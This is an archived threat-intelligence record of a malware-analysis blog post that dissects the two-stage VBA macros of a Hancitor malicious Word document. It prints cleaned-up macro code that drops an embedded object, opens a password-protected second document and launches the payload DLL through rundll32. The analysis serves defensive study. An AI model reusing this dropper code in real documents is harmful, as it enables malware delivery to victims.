{
	"id": "9f50c771-6cfb-43a4-8b92-f866d46d4b5c",
	"created_at": "2026-04-06T00:14:46.43843Z",
	"updated_at": "2026-04-10T03:24:24.503798Z",
	"deleted_at": null,
	"sha1_hash": "9f63df8e741ae08eb0f311987e4a53104ed2bbdf",
	"title": "HANCITOR: Analysing The Malicious Document | 0ffset Training Solutions",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 872708,
	"plain_text": "HANCITOR: Analysing The Malicious Document | 0ffset Training\r\nSolutions\r\nBy Chuong Dong\r\nPublished: 2021-11-23 · Archived: 2026-04-05 21:48:00 UTC\r\nHANCITOR (aka CHANITOR) is a prevalent malware loader that spreads through social engineering in the form\r\nof Word or DocuSign® documents. The infected document includes instructions for the victim to manually allow\r\nthe malicious macro code to be executed. The HANCITOR executable payload dropped by the macro code is used\r\nto download other malware on the victim machines such as FickerStealer, Cuba ransomware, Zeppelin\r\nransomware, and Cobalt Strike beacons.\r\nIn this post particularly, we will analyze the first two stages of a HANCITOR infection through Word documents.\r\nSimilar to other campaigns, the initial stage is delivered through malspam, and the final HANCITOR DLL\r\npayload is dropped and executed after the victim opens the document.\r\nTo follow along, you can grab the sample as well as the PCAP files for it on Malware-Traffic-Analysis.net.\r\nSHA256: 8733E81F7EF203F4D1C4208B75C6AB2548259CC35D68DF10EBF23A31E777871B\r\nStep 1: Dumping First Stage Macros\r\nUpon opening the document in Word, we can see an image directing us to click on the “Enable editing” and\r\n“Enable content” buttons with a security alert saying that macros have been disabled. This hints to us that this\r\ndocument contains some macro code that will be executed when we click to enable macro.\r\nhttps://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-maldoc-analysis/\r\nPage 1 of 10\n\nWe can use olevba to quickly dump and analyze the document’s macro code. As shown below, the tool identifies\r\nthe Document_Open function with type AutoExec, which is executed if the victim presses the “Enable content”\r\nbutton. There are other suspicious commands to execute other files on the system, so we can analyze the VBA\r\ncode to examine its full functionalities.\r\nBelow is the full VBA macros dumped from olevba.\r\nStage 1 Macro Code Dump\r\nStep 2: Analyzing First Stage Macros\r\nThe Document_Open function is a special function that gets executed when the document is opened, so it is\r\ndefinitely a good starting point for us to begin analyzing. The raw Document_Open function is documented\r\nbelow.\r\nhttps://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-maldoc-analysis/\r\nPage 2 of 10\n\nPrivate Sub Document_Open()\r\n Dim dfgdgdg\r\n Call s1(\"Lo\")\r\n Dim fds, fdsa As String\r\n fds = \"\\\"\r\n fdsa = \".d\"\r\n Call s2(\"cal/\")\r\n Call ass\r\n Call acc\r\n Dim kytrewwf As String\r\n kytrewwf = Options.DefaultFilePath(wdUserTemplatesPath)\r\n If Dir(kytrewwf \u0026 fds \u0026 \"zoro\" \u0026 fdsa \u0026 vssfs) = \"\" Then\r\n Dim mySum\r\n mySum = Application.Run(\"bvxfcsd\")\r\n If Len(nccx) \u003e 2 Then\r\n Call nam(nccx, kytrewwf)\r\n Call pppx(kytrewwf \u0026 fds \u0026 \"zoro\" \u0026 fdsa \u0026 vssfs)\r\n End If\r\n End If\r\nEnd Sub\r\nMost of the variable declarations and function calls are just simple obfuscation techniques, which are used to\r\nbreak down strings and hide them from being dumped directly from the Word document. If we resolve these and\r\nreplace the variables with their content, the first IF statement becomes a check to see if the “zoro.doc” file in the\r\nuser template path exists.\r\nIf Dir(kytrewwf \u0026 \"\\\" \u0026 \"zoro\" \u0026 \".d\" \u0026 \"oc\") = \"\" Then\r\nIf it doesn’t exist, the macros calls the Application.Run method to execute the function bvxfcsd. Below is the\r\ncleaned up version of this function’s code.\r\nSub bvxfcsd()\r\n Selection.MoveDown Unit:=wdLine, Count:=3\r\n Selection.MoveRight Unit:=wdCharacter, Count:=2\r\n Selection.MoveDown Unit:=wdLine, Count:=3\r\n Selection.MoveRight Unit:=wdCharacter, Count:=2\r\n Selection.TypeBackspace\r\n Selection.Copy\r\n \r\n Dim uuuuc\r\n uuuuc = Options.DefaultFilePath(wdUserTemplatesPath)\r\nhttps://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-maldoc-analysis/\r\nPage 3 of 10\n\nntgs = 50\r\n sda = 49\r\n While sda \u003c 50\r\n ntgs = ntgs - 1\r\n If Dir(Left(uuuuc, ntgs) \u0026 \"Local/Temp\", vbDirectory) = \"\" Then\r\n Else\r\n sda = 61\r\n End If\r\n Wend\r\n Call ThisDocument.hdhdd(Left(uuuuc, ntgs) \u0026 \"Local/Temp\")\r\nEnd Sub\r\nThe first thing we see is a set of calls executing methods from the Selection property. Since the cursor points to\r\nthe beginning of the document initially, these calls move it down 3 lines, right 2 characters, down 3 lines, right 2\r\ncharacters, and delete one character from the cursor.\r\nThis block of code might seem harmless, but it is an effective way to manually drop VBA objects into the file\r\nsystem. If we move the cursor according to the steps above, we see that the cursor stops at a visible but small\r\nblack box that isn’t there initially.\r\nThis black box represents a VBA object embedded in the document, and once interacted by the victim or the VBA\r\nmacros, the object is automatically dropped to the file system. Interactions that trigger this include copying the\r\nobject, which is invoked when the macros calls the function Selection.Copy.\r\nMicrosoft documents here that embedded Word Objects are stored as temporary files in the Temp directory for the\r\ndocument to interact with if needed. Therefore, we know that this object, whatever it is, is dropped somewhere in\r\nthe victim’s Temp directory.\r\nWe can go further and examine the object’s properties to find the exact path of it.\r\nhttps://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-maldoc-analysis/\r\nPage 4 of 10\n\nhttps://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-maldoc-analysis/\r\nPage 5 of 10\n\nAs shown, the object is dropped to the file zoro.kl in the folder {90224AF4-616C-4FE4-9467-D6BA4B34E24E}\r\ninside the Temp directory of my analysis VM. This is in fact the second stage Word document that is later\r\nlaunched in the code, but we will keep analyzing the VBA macros to see how the code interacts with it.\r\nAfter dropping this file, the function loops to find the path to the Local\\Temp directory that is valid and calls the\r\nfunction hdhdd with the Temp directory path as parameter. Below is the content of that function.\r\nSub hdhdd(asda As String)\r\n Dim MyFSO As FileSystemObject\r\n Dim MyFile As File\r\n Dim SourceFolder As String\r\n Dim DestinationFolder As String\r\n Dim MyFolder As Folder\r\n Dim MySubFolder As Folder\r\n Set MyFSO = New Scripting.FileSystemObject\r\n Call Search(MyFSO.GetFolder(asda), nccx)\r\nEnd Sub\r\nThis function basically just retrieves the folder object for the path from its parameter, which is the Temp path, and\r\ncalls the Search function. Below is the cleaned up version of the function’s content.\r\nSub Search(in_dirpath As Object, out_string As String)\r\n Dim subfolder As Object\r\n Dim fileobject As Object\r\n For Each subfolder In mds.SubFolders\r\n Search subfolder, in_dirpath\r\n Next subfolder\r\n For Each fileobject In in_dirpath.Files\r\n If fileobject.Name = \"zoro.kl\" Then\r\n out_string = fileobject\r\n End If\r\n Next fileobject\r\nExit Sub\r\nErrHandle:\r\n Err.Clear\r\nEnd Sub\r\nhttps://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-maldoc-analysis/\r\nPage 6 of 10\n\nThe first loop of this function iterates through all subfolders in the Temp path. For each of those subfolders, the\r\nfunction recursively calls itself to search in that subfolder. At the base case of the recursion where there are no\r\nmore subfolders in the current folder, the code iterates through all file objects and checks if its name is zoro.kl.\r\nOnce found, the code sets the second parameter to this file object. Ultimately, this Search call recursively searches\r\nfor the zoro.kl file that is dropped earlier and sets the global variable nccx to the file path.\r\nAfter this part, the code picks up back in the Document_Open function where the final IF statement checks if the\r\nlength of nccx (the zoro.kl file path) is longer than 2. It then calls the function nam passing the file path and the\r\nuser template path respectively. Below is the cleaned up version of this function.\r\nSub nam(zoro_kl_file_path As String, user_template_path As String)\r\n Dim oxl\r\n oxl = \"\\zoro.doc\"\r\n Name zoro_kl_file_path As user_template_path \u0026 oxl\r\nEnd Sub\r\nThis function executes the VBA Name statement to rename the zoro.kl file in the Temp folder to zoro.doc and\r\nmove it to the user template folder.\r\nThe final call in Document_Open is to the function pppx with the full path to the zoro.doc file as parameter.\r\nBelow is the content of that function.\r\nSub pppx(pili As String)\r\n Documents.Open FileName:=pili, ConfirmConversions:=False, ReadOnly:= _\r\n False, AddToRecentFiles:=False, PasswordDocument:=\"doyouknowthatthegodsofdeathonlyeatapples?\", _\r\n PasswordTemplate:=\"\", Revert:=False, WritePasswordDocument:=\"\", _\r\n WritePasswordTemplate:=\"\", Format:=wdOpenFormatAuto, XMLTransform:=\"\"\r\nEnd Sub\r\nThis function executes the Documents.Open method to open the zoro.doc file. A different thing about this newly\r\ndropped document is that it comes with the password “doyouknowthatthegodsofdeathonlyeatapples?”, which is\r\nused to open and execute the macro code inside.\r\nStep 3: Dumping Stage 2 Macros\r\nSimilar to the first stage, the second stage document contains some macro code that can be dumped by olevba.\r\nHowever, the default olevba command does not work for this document and throws an error that the document can\r\nnot be decrypted.\r\nhttps://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-maldoc-analysis/\r\nPage 7 of 10\n\nSince the document is encrypted with the password we see in the earlier stage, we must provide that in the olevba\r\ncommand to decrypt the document before dumping its macro code.\r\nolevba zoro.doc -p doyouknowthatthegodsofdeathonlyeatapples?\r\nAs shown from the olevba result below, the document’s macros contain a Document_Open function with type\r\nAutoExec as well as the functionality to run an executable file.\r\nThe content of the macros is recorded below.\r\nStage 2 Macro Code Dump\r\nStep 4: Analyzing Stage 2 Macros\r\nAgain, we begin our analysis at the Document_Open function as it is the entry point of the code.\r\nHere, we can see a similar code pattern to the code in the first stage. It first checks if the gelforr.dap file exists in\r\nthe user template path, and if it does not, the same methods from the Selection property are executed to drop the\r\ndocument’s VBA object into the Temp directory.\r\nPrivate Sub Document_Open()\r\n Dim vcbc As String\r\n vcbc = Options.DefaultFilePath(wdUserTemplatesPath)\r\n If Dir(vcbc \u0026 \"\\gelforr.dap\") = \"\" Then\r\n Selection.MoveDown Unit:=wdLine, Count:=3\r\n Selection.MoveRight Unit:=wdCharacter, Count:=2\r\n Selection.MoveDown Unit:=wdLine, Count:=3\r\nhttps://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-maldoc-analysis/\r\nPage 8 of 10\n\nSelection.MoveRight Unit:=wdCharacter, Count:=2\r\n Selection.TypeBackspace\r\n Selection.Copy\r\n Call bvxfcsd\r\n If Len(hdv) \u003e 2 Then\r\n Call nam(hdv)\r\n Shell (\"rundl\" \u0026 \"l32.exe\" \u0026 \" \" \u0026 vcbc \u0026 \"\\gelforr.dap\" \u0026 \",BNJAFSRSQIX\")\r\n ActiveDocument.Close\r\n End If\r\n End If\r\nEnd Sub\r\nNext, the function bvxfcsd is called. As seen below in the code’s cleaned-up version, this function is a copy of the\r\nfunction bvxfcsd in the first stage, and they both call the function hdhdd to search for the dropped VBA object in\r\nthe Temp directory. The only difference between these stages is the name of the object file being searched, with\r\nthe second stage’s document searching for the filename gelfor.dap.\r\nSub bvxfcsd()\r\n Dim uuuuc\r\n uuuuc = Options.DefaultFilePath(wdUserTemplatesPath)\r\n ntgs = 50\r\n sda = 49\r\n While sda \u003c 50\r\n ntgs = ntgs - 1\r\n If Dir(Left(uuuuc, ntgs) \u0026 \"Local/Temp\", vbDirectory) = \"\" Then\r\n Else\r\n sda = 61\r\n End If\r\n Wend\r\n Call ThisDocument.hdhdd(Left(uuuuc, ntgs) \u0026 ewrwsdf)\r\nEnd Sub\r\nOnce found, the path to the gelfor.dap file is written to the hdv variable, which is then passed to the function nam\r\nas parameter. Similar to the nam function in the first stage, this function renames the gelfor.dap file in the Temp\r\npath to gelforr.dap and moves it to the user template folder.\r\nSub nam(pafs As String)\r\n Name pafs As pls \u0026 \"\\gelforr.dap\"\r\nEnd Sub\r\nFinally, the code calls the Shell VBA function to execute the following command.\r\nhttps://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-maldoc-analysis/\r\nPage 9 of 10\n\nrundll32.exe \u003cuser template path\u003e\\gelforr.dap, BNJAFSRSQIX\r\nFrom this, we know that the dropped VBA object is a DLL file, and the second stage’s document executes its\r\nexported function BNJAFSRSQIX using the rundll32.exe executable.\r\nThe dropped DLL is the final HANCITOR payload that is used to download a Cobalt Strike beacon, and we will\r\nbe analyzing HANCITOR functionalities using this sample in the next blog post!\r\nIf you have any questions regarding the analysis, feel free to reach out to me via Twitter.\r\nSource: https://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-maldoc-analysis/\r\nhttps://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-maldoc-analysis/\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-maldoc-analysis/"
	],
	"report_names": [
		"hancitor-maldoc-analysis"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434486,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9f63df8e741ae08eb0f311987e4a53104ed2bbdf.pdf",
		"text": "https://archive.orkl.eu/9f63df8e741ae08eb0f311987e4a53104ed2bbdf.txt",
		"img": "https://archive.orkl.eu/9f63df8e741ae08eb0f311987e4a53104ed2bbdf.jpg"
	}
}